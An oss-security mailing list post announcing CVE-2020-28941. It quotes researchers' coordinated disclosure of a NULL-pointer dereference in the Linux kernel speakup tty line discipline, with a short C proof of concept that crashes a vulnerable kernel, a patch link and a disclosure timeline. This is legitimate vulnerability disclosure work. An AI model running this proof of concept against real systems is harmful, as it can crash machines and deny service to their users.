'Re: [oss-security] Linux kernel NULL-ptr deref bug in spk_ttyio_ldisc_close'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    Re: [oss-security] Linux kernel NULL-ptr deref bug in spk_ttyio_ldisc_close
From:       Marcus Meissner <meissner () suse ! de>
Date:       2020-11-19 15:26:38
Message-ID: 20201119162507.GA4986 () suse ! de
[Download RAW message or body]

Hi,

Mitre has assigned CVE-2020-28941 to this issue.

Ciao, Marcus
On Thu, Nov 19, 2020 at 10:46:59AM +0800, Shisong Qin wrote:
> Hi,
> 
> Recently we found a NULL-ptr deref BUG in spk_ttyio.c in the longterm 4.19
> Linux kernel, and it could also be triggered in the 5.9 Linux kernel. In
> function spk_ttyio_ldisc_close, it would free the "speakup_tty->disc_data"
> and set "speakup_tty" to NULL. However, if we open two tty device and use
> tiocsetd() to set them as "speakup_tty" and close them in turn, the first
> close would set "speakup_tty" to NULL, and in the second close would try to
> dereference the "speakup_tty", leading to a NULL-ptr deref crash.
> 
> This bug could be reproduced in the longterm 4.19 Linux kernel with
> CONFIG_STAGING=y, CONFIG_SPEAKUP=y and CONFIG_KASAN=y.
> To reproduce it in the 5.9 Linux kernel, CONFIG_ACCESSIBILITY=y is also
> required in config, and here is a simple poc:
> 
> #define _GNU_SOURCE
> 
> #include <dirent.h>
> #include <endian.h>
> #include <errno.h>
> #include <fcntl.h>
> #include <signal.h>
> #include <stdarg.h>
> #include <stdbool.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/prctl.h>
> #include <sys/stat.h>
> #include <sys/syscall.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> #include <time.h>
> #include <unistd.h>
> 
> int main(void) {
> int disc = 0x1a;
> int fd = open("/dev/ptmx", O_RDWR, 0);
> ioctl(fd, 0x5423, &disc);
> int fd2 = open("/dev/ptmx", O_RDWR, 0);
> ioctl(fd2, 0x5423, &disc);
> return 0;
> }
> 
> After the process return, it seems the automated calling to release would
> trigger the NULL-ptr deref bug.
> 
> Here is the commit to patch this BUG:
> https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=d4122754442799187d5d537a9c039a49a67e57f1
>  
> Timeline:
> * 2020/11/10 - Vulnerability reported to security@kernel.org
> * 2020/11/11 - Vulnerability confirmed, and reported to
> linux-distros@vs.openwall.org.
> * 2020/11/19 - Vulnerability opened.
> 
> Thanks,
> Shisong Qin and Bodong Zhao, Tsinghua University

-- 
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi. 3.1-33,+49-911-740 \
53-432,,serv=loki,mail=wotan,type=real <meissner@suse.de>


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic